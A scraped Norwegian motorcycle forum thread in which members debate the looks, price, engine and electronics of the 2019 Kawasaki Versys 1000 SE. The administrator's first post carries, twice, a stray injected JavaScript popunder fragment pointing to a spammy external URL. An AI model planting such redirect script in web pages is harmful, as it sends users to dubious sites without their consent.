Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
- AJ
- Administrator
- Innlegg: 37850
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Jeg må si jeg ble positivt overrasket over det nye utseendet på nye Versys. I mine øyne ser denne atskillig bedre ut enn tidligere modell. Mer aggressiv og moderne framtoning og ikke minst et langt heldigere ekospotteutforming og ikke minst betydelig modernisert på utstyrsfronten. Prismessig fra ca. 225.000,- for rimeligste versjon. Men har lest på nettet på utenlandske forum spesielt at fullspekket modell blir i dyreste laget for mange ut fra det jeg har lest... .
Blir neppe noe bedre her i landet, vil jeg tro.
Men kanskje er den verd prisen ?
Så? Hva mener vi om denne?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Mer utfyllende info her:
https://www.kawasaki.no/no/products/Adv ... g0MWA1eWlk
Blir neppe noe bedre her i landet, vil jeg tro.
Men kanskje er den verd prisen ?
Så? Hva mener vi om denne?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Mer utfyllende info her:
https://www.kawasaki.no/no/products/Adv ... g0MWA1eWlk
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
- supersic
- Innlegg: 458
- Registrert: 31 jan 2016, 14:54
- Motorsykkelen din: SpeedTriple
- Sted: Skedsmokorset
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Vet ikke om det er mulig å lage en adventure sykkel som ser "bra" ut.
Sikkert bedre kvalitet enn KTM
Hadde jeg valgt den fremfor en KTM, nope
Sikkert bedre kvalitet enn KTM
Hadde jeg valgt den fremfor en KTM, nope
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Hva som ser bra ut er vel 100% smak og behag...
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
- AJ
- Administrator
- Innlegg: 37850
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Jeg tror heller ikke denne hadde nådd helt opp da jeg byttet inn min forrige KTM i en nyere versjon.
Skjønt man vet aldri. Kanskje en prøvekjøring med nye Versys 1000 SE hadde greid å overbevise meg?
Første versjon av forrige modell var i hvert fall veldig god å sitte på da jeg prøvde det på MC-Messa for noen år siden.
Og salen på den nye ser ikke ut til å være annerledes enn på forrige modell.
Motoren har eksistert i mange år og er av kjent Kawamerke og ses vel på som en av de aller beste og mest pålitelige firesylindrede MC-motorene der ute.
Men tiden ha kanskje løpt fra den likevel... .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Eh.. ok. Tror vi kan være enige om å være uenige der. Altså at du tar feil
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
-
- Innlegg: 334
- Registrert: 11 nov 2016, 19:53
- Motorsykkelen din: Triumph tiger 1200 rally pro 2022
- Sted: Sarpsborg
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Min mening: sykkelen var fin å se på. Likte utseende på den og grønnfargen var knall. Er kjørekomforten som på de eldre modellene så er den god å kjøre også. Mener selger sa at salen på SE og de vanlige modellene ikke var den samme. Mye finesser som bl.a elektroniske dempere,cruise kontroll og oversiktelig instrumentering. Jeg likte den veldig godt🏍
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Var og prøvesatt denne forrige uke. Skulle jeg hatt en sykkel med rett opp og ned sittestilling så ville den absolutt blitt vurdert. Masse tekniske løsninger som jeg liker samt integrerte kofferter osv.
Når det gjelder japansk kvalitet er jeg sikker på at denne er like god som det meste derfra. Blir spennende å følge med på brukererfaringene som blir gjort dette året, ikke minst når det gjelder elektronikken. Likte systemet med en app på tlf for å sette opp dempere før kjøreturen.
Skal prøvekjøre denne iallefall. Da kan jeg si om sykkel passer mitt kjøremønster og kjørestil
Når det gjelder japansk kvalitet er jeg sikker på at denne er like god som det meste derfra. Blir spennende å følge med på brukererfaringene som blir gjort dette året, ikke minst når det gjelder elektronikken. Likte systemet med en app på tlf for å sette opp dempere før kjøreturen.
Skal prøvekjøre denne iallefall. Da kan jeg si om sykkel passer mitt kjøremønster og kjørestil
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Sikkert bare jeg som synes det, men den minner meg om en supergrønn og en kantete versjon av en ducati multistrada
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Den hadde vært fin å hatt i tillegg til ninja,n men har nok ikke råd
98 Kawasaki ZX-9R
- Bjerknez
- Innlegg: 22867
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Jeg synes sykkelen så absolutt ser bra ut. Men i den prisklassen ville jeg valgt en BMW S1000XR når som helst fremfor denne.
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Har også veldig sansen for denne og tror den er knall, men i min bok er Versysen en budsjettsykkel. Det henger nok igjen fra tidligere, men etter prisen å dømme er det ikke tilfellet.
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Ser ikke bra ut, men er det trolig.
- E-strom
- Innlegg: 642
- Registrert: 08 apr 2012, 11:33
- Motorsykkelen din: BMW R1200GS og DRZ400S
- Sted: Trondheim
- Kontakt:
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Når jeg får sjansen skal jeg kjører årets utgave også - har kjørt begge de to foregående. Passer utmerket for min foretrukne kjørestil som er langt unna E6 og tilsvarende - helst på svingete veier som jo kan ha varierende kvalitet.
Motoren er vel omtrent den samme som på forrige versjon, og da er den ganske enkelt helt suveren - typisk Kawa - drar som et lokomotiv og åpner du for fri flyt svarer motoren med den typiske "hulingen" som reiser nakkehårene og rister førerkortet ut av lomma...
Mer at framfelgen er en 17-tommer, så dette blir vel mer en sports-tourer med adventure sittestilling.
Motoren er vel omtrent den samme som på forrige versjon, og da er den ganske enkelt helt suveren - typisk Kawa - drar som et lokomotiv og åpner du for fri flyt svarer motoren med den typiske "hulingen" som reiser nakkehårene og rister førerkortet ut av lomma...
Mer at framfelgen er en 17-tommer, så dette blir vel mer en sports-tourer med adventure sittestilling.
---------------------------------------------------------------------------------------------------------
Most motorcycle problems are caused by the nut that connects the handlebars to the saddle
Kilde: http://www.quotegarden.com/motorcycles.html
Most motorcycle problems are caused by the nut that connects the handlebars to the saddle
Kilde: http://www.quotegarden.com/motorcycles.html
- AJ
- Administrator
- Innlegg: 37850
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Hva synes vi om nye 2019 Kawasaki Versys 1000 SE?
Gleder meg til å studere denne nærmere i morgen!
Kanskje den eneste firesylindringen på messa som får mer enn vanlig oppmerksomhet .
Kanskje den eneste firesylindringen på messa som får mer enn vanlig oppmerksomhet .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering